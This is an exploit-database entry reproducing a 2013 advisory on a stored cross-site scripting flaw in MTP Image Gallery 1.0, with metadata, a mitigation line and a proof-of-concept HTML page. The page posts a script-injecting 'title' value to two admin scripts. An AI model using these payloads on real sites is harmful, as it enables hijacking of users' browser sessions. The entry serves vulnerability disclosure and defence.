MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability

vendor:

MTP Image Gallery

by:

Gjoko 'LiquidWorm' Krstic

7,5

CVSS

HIGH

Stored XSS

CWE

Product Name: MTP Image Gallery

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:morephp.net:mtp_image_gallery:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Apache2

2013

MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability

MTP Image Gallery suffers from a stored XSS vulnerability when parsing user input to the 'title' parameter via POST method thru 'edit_photos.php' and 'add_cat.php' scripts. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session.

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.

Source

Exploit-DB raw data:

<!--

MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability


Vendor: MTP Scripts
Product web page: http://www.morephp.net
Affected version: 1.0

Summary: MTP Image Gallery offers more control, better
uploading and enhanced performance. With MTP Image Gallery
you can easily create and maintain albums of photos via an
intuitive, web interface.

Desc: MTP Image Gallery suffers from a stored XSS vulnerability
when parsing user input to the 'title' parameter via POST method
thru 'edit_photos.php' and 'add_cat.php' scripts. Attackers can
exploit this weakness to execute arbitrary HTML and script code
in a user's browser session.

Tested on: Linux, Apache2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5130
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5130.php


17.02.2013

-->

<html>
<head>
<title>MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability</title>
</head>
<body><center>
<form method="POST" action="http://localhost/gallery/admin/edit_photos.php?ID=39&action=edit">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="Filedata" value="" />
<input type="hidden" name="cats" value="12" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="full" value="1" />
<input type="hidden" name="views" value="1" />
<input type="hidden" name="rating" value="1" />
<input type="hidden" name="author" value="lqwrm" />
<input type="hidden" name="action" value="add" />
<input type="submit" value="XSS #1" />
</form>
<br /><br />
<form method="POST" action="http://localhost/gallery/admin/add_cat.php">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="cats" value="1" />
<input type="hidden" name="full" value="1" />
<input type="hidden" name="title" value='"><script>alert(2);</script>' />
<input type="submit" value="XSS #2" />
</form>
</center></body>
</html>